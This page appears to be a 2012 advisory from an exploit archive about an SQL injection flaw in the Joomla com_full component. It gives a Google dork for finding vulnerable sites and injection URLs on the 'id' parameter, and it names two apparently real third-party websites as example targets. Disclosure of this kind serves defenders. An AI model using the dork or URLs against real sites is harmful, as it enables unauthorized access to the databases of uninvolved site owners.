Joomla com_full SQL Injection

2012.01.22
Credit: the_cyber_nuxbie
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:\"/index.php?option=com_full\"

[ Joomla Component com_full SQL Injection Vulnerability 0day ] #[~] Author : the_cyber_nuxbie #[~] Home : www.thecybernuxbie.com #[~] E-mail : staff@thecybernuxbie.com #[~] Found : 20 January 2012 - 07:45 PM. #[~] Tested On : Windows 7 Ultimate. #[~] Google Dork : inurl:"/index.php?option=com_full" [x] exploits: http://localhost/index.php?option=com_full&dzial=praktyki&id=[SQLi] http://localhost/index.php?option=com_full&dzial=dam_prace&id=[SQLi] - Example Exploits: http://napedyonline.pl/index.php?option=com_full&dzial=praktyki&id=8' [SQLi] http://sterowniki-online.pl/index.php?option=com_full&dzial=dam_prace&id=7' [SQLi] - N0T35: 0day no more... "n0 d0rk f0r kiddi0t" Thanks To: All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc... - 20 January 2012, GMT +07:35, IT-Underground, Indonesia.

References:

http://www.thecybernuxbie.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top